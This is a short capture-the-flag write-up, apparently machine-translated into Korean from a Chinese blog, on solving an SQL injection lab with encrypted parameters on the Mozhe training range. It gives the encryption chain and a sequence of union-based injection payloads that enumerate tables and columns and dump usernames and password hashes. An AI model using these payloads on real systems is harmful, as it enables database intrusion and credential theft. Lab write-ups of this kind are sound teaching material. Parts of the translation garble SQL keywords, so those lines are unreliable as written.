SQL 인젝션 취약점 테스트(파라미터 암호화) & Mozhe Shooting Range

아이디 발견 후 복호화된 데이터

해독을 시도하지만 해독할 수 없습니다. 여러 암호화 방법 또는 소금의 조합이 있을 수 있습니다.

7Kbscan 스캔 웹 디렉토리

list.zip에는 암호화된 파일이 포함되어 있습니다.

기능이 무엇인지 이해하고,

암호화 원칙: 평문 --> AES 암호화 --> bsse64 암호화 --> base64 암호화 --> 암호문

ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09 해독

빌드 페이로드 방법

다음 진술은 위의 내용에 따라 모두 암호화됩니다.

에코 확인: -1 union select 1,2,3,4_mozhe

버전: -1 union select 1,database(),version(),4_mozhe

설명: -1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1_mozhe

버전 이름: -1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1_mozhe

爆数据:-1 합집합 선택 1,group_concat(이름,암호),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1_mozhe

저장소 암호: 형식적으로는 일반적으로 md5 암호화입니다.

두 개의 계정이 로그인을 시도합니다.

하단에 열쇠가 있습니다

Supongo que te gusta

Origin blog.csdn.net/qq_63283137/article/details/127181141
Recomendado
Clasificación